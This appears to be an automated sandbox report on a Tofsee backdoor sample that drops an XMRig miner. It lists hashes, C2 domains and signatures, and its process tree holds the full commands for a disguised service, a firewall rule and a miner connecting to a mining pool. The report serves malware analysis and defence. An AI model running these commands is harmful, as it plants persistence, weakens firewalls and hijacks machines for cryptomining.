Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    10-02-2023 14:00

General

  • Target

    file.exe

  • Size

    357KB

  • MD5

    417696104a850fb6d641959c9e084e0f

  • SHA1

    99f739f830c5555b8e00c8d40dca115f14d5d780

  • SHA256

    9dbd56890ad94f339c4b41633cb919614717aa56ef6fd109823f5b8fc8cb64cc

  • SHA512

    c7eaf00e1104a3d9d74dc6f3658b7af309979db64858ff339db511039b965e420056c21fb315bfe4b4e2bb98432d4ccb9f1b565871b33cab2f130cdc368186a2

  • SSDEEP

    3072:/9N5bk+xtGNaL/ROaFjXrEThTVDsSKnxkv4lZC9nf6NT2UU:l5LgaLkaFjkhJYSKxm4lOnfWT

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:900
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ydfgsdws\
      2⤵
        PID:1520
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\nyuzqjvk.exe" C:\Windows\SysWOW64\ydfgsdws\
        2⤵
          PID:1240
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create ydfgsdws binPath= "C:\Windows\SysWOW64\ydfgsdws\nyuzqjvk.exe /d\"C:\Users\Admin\AppData\Local\Temp\file.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:1300
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description ydfgsdws "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:272
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start ydfgsdws
          2⤵
          • Launches sc.exe
          PID:1644
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:1856
      • C:\Windows\SysWOW64\ydfgsdws\nyuzqjvk.exe
        C:\Windows\SysWOW64\ydfgsdws\nyuzqjvk.exe /d"C:\Users\Admin\AppData\Local\Temp\file.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:804
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Windows security bypass
          • Sets service image path in registry
          • Deletes itself
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:316
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1520

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\nyuzqjvk.exe

        Filesize

        13.6MB

        MD5

        552ad1c9d370049c4b74c244a2d4e0f6

        SHA1

        c5a452cb86e719192ede43c50b8ad45e63da977a

        SHA256

        51257b1632bc98d496884ce32f73b7922e06fa5a7c757d7ee29db57892a0ff5b

        SHA512

        fdae23380544439f7e7e545345420db9cab86ee4b888bc4ece4b8bedd2e3cfc7a57b8db6d3dbb41739d838b833528bc6b5b9d9d9edacad52cba6507ef71204cf

      • C:\Windows\SysWOW64\ydfgsdws\nyuzqjvk.exe

        Filesize

        13.6MB

        MD5

        552ad1c9d370049c4b74c244a2d4e0f6

        SHA1

        c5a452cb86e719192ede43c50b8ad45e63da977a

        SHA256

        51257b1632bc98d496884ce32f73b7922e06fa5a7c757d7ee29db57892a0ff5b

        SHA512

        fdae23380544439f7e7e545345420db9cab86ee4b888bc4ece4b8bedd2e3cfc7a57b8db6d3dbb41739d838b833528bc6b5b9d9d9edacad52cba6507ef71204cf

      • memory/272-62-0x0000000000000000-mapping.dmp

      • memory/316-81-0x0000000001970000-0x0000000001B7F000-memory.dmp

        Filesize

        2.1MB

      • memory/316-84-0x00000000000E0000-0x00000000000E6000-memory.dmp

        Filesize

        24KB

      • memory/316-97-0x0000000000220000-0x0000000000227000-memory.dmp

        Filesize

        28KB

      • memory/316-94-0x0000000005AA0000-0x0000000005EAB000-memory.dmp

        Filesize

        4.0MB

      • memory/316-91-0x0000000000210000-0x0000000000215000-memory.dmp

        Filesize

        20KB

      • memory/316-90-0x00000000000C0000-0x00000000000D5000-memory.dmp

        Filesize

        84KB

      • memory/316-87-0x00000000000F0000-0x0000000000100000-memory.dmp

        Filesize

        64KB

      • memory/316-80-0x00000000000C0000-0x00000000000D5000-memory.dmp

        Filesize

        84KB

      • memory/316-73-0x00000000000C0000-0x00000000000D5000-memory.dmp

        Filesize

        84KB

      • memory/316-74-0x00000000000C9A6B-mapping.dmp

      • memory/316-71-0x00000000000C0000-0x00000000000D5000-memory.dmp

        Filesize

        84KB

      • memory/804-75-0x000000000062D000-0x0000000000643000-memory.dmp

        Filesize

        88KB

      • memory/804-78-0x0000000000400000-0x0000000000485000-memory.dmp

        Filesize

        532KB

      • memory/900-58-0x0000000000400000-0x0000000000485000-memory.dmp

        Filesize

        532KB

      • memory/900-57-0x0000000000220000-0x0000000000233000-memory.dmp

        Filesize

        76KB

      • memory/900-66-0x00000000005FD000-0x0000000000613000-memory.dmp

        Filesize

        88KB

      • memory/900-67-0x0000000000400000-0x0000000000485000-memory.dmp

        Filesize

        532KB

      • memory/900-64-0x00000000005FD000-0x0000000000613000-memory.dmp

        Filesize

        88KB

      • memory/900-54-0x0000000075E11000-0x0000000075E13000-memory.dmp

        Filesize

        8KB

      • memory/900-56-0x00000000005FD000-0x0000000000613000-memory.dmp

        Filesize

        88KB

      • memory/1240-59-0x0000000000000000-mapping.dmp

      • memory/1300-61-0x0000000000000000-mapping.dmp

      • memory/1520-55-0x0000000000000000-mapping.dmp

      • memory/1520-100-0x00000000000C0000-0x00000000001B1000-memory.dmp

        Filesize

        964KB

      • memory/1520-102-0x00000000000C0000-0x00000000001B1000-memory.dmp

        Filesize

        964KB

      • memory/1520-107-0x000000000015259C-mapping.dmp

      • memory/1644-63-0x0000000000000000-mapping.dmp

      • memory/1856-65-0x0000000000000000-mapping.dmp